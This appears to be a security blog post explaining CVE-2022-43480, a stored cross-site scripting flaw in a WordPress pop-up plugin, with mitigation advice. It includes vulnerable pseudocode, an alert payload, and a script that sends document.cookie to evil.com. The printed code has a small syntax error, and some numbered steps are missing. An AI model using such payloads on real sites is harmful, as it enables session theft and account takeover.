Security in WordPress plugins is critical. One overlooked issue can leave your whole site open to attackers. Today, we’ll look at CVE-2022-43480, a real WordPress plugin vulnerability found in the *Magneticlab Sàrl Homepage Pop-up* plugin (versions 1.2.5 and below). This bug lets admin users (and any user with admin rights) inject stored JavaScript, which then runs for anyone visiting your site – a classic case of Authenticated Stored XSS (Cross-Site Scripting).
Let’s break down how this vulnerability works, see how it can be exploited, and how you can protect your site.
What is CVE-2022-43480?
In the Magneticlab Sàrl Homepage Pop-up plugin (up to version 1.2.5), certain user-provided fields were saved directly into the WordPress database and then displayed without proper escaping. This left the door open for anyone with admin access (or higher) to inject JavaScript code. That JavaScript would then run in the browsers of other users (like other admins or editors).
Key factors
- Vulnerable plugin: Homepage Pop-up by Magneticlab Sàrl
Vulnerability type: Stored Cross-Site Scripting (XSS)
Where is the Vulnerability?
The vulnerable plugin allows admins to customize pop-up contents from the plugin’s settings page in the WordPress backend (usually at wp-admin/options-general.php?page=homepage_popup). Fields like the popup title, message, or links are saved to the database and then displayed — with little or no sanitization — on the public-facing pages.
Let’s look at where things go wrong inside the plugin code. Below is a simplified version of what the vulnerable code looks like:
// Pseudocode version for explanation
if(isset($_POST['homepage_popup_message'])) {
// Vulnerable: saves user input directly to DB
update_option('homepage_popup_message', $_POST['homepage_popup_message']);
}
// Later, in the front-end popup template
<?php
// Vulnerable: outputs content without escaping
echo get_option('homepage_popup_message');
?>
This is the classic recipe for XSS: Accept user input, store it, then print it without escaping.
Exploit Details: Attack in Action
Let’s walk through a simple, real-life attack scenario.
1. Attacker gets admin access
Since the plugin settings are only accessible to admins (or higher), the attacker must already have these privileges. This is less dangerous than a vulnerability open to anyone, but once inside, your site is wide open.
In the *Homepage Pop-up* message field, the attacker enters
<script>alert('XSS by CVE-2022-43480!');</script>
Hit “Save”, and the plugin stores this as the message.
3. All visitors now see the attack
Anyone visiting the homepage (including other logged-in admins, editors, or even site visitors if the popup appears for them) will now trigger the alert box. In real life, attackers could run more dangerous JavaScript:
<script>
// Steal cookies, session, deface, etc
fetch('http://evil.com/steal?cookie='; + document.cookie);
</script>
Compromise other users, including other administrators.
Once an attacker gets admin, they can do a lot – but XSS raises the stakes: they can quietly compromise other admins, even leave persistent backdoors.
1. Upgrade the Plugin ASAP
The vendor fixed this in version 1.2.6 and above. If you still run an old version, update NOW!
→ Homepage Pop-up Plugin Page
### 2. Harden Input/Output
If you are a plugin developer, always escape output and sanitize input
// Use sanitize_text_field() or wp_kses_post() for input
update_option('homepage_popup_message', wp_kses_post($_POST['homepage_popup_message']));
// Use esc_html() or similar for output
echo esc_html(get_option('homepage_popup_message'));
References
- CVE-2022-43480 on NVD
- Homepage Pop-up plugin on WordPress.org
- WPScan Entry
- OWASP: Cross Site Scripting (XSS)
Timeline
Published on: 04/16/2023 09:15:00 UTC
Last modified on: 04/21/2023 04:16:00 UTC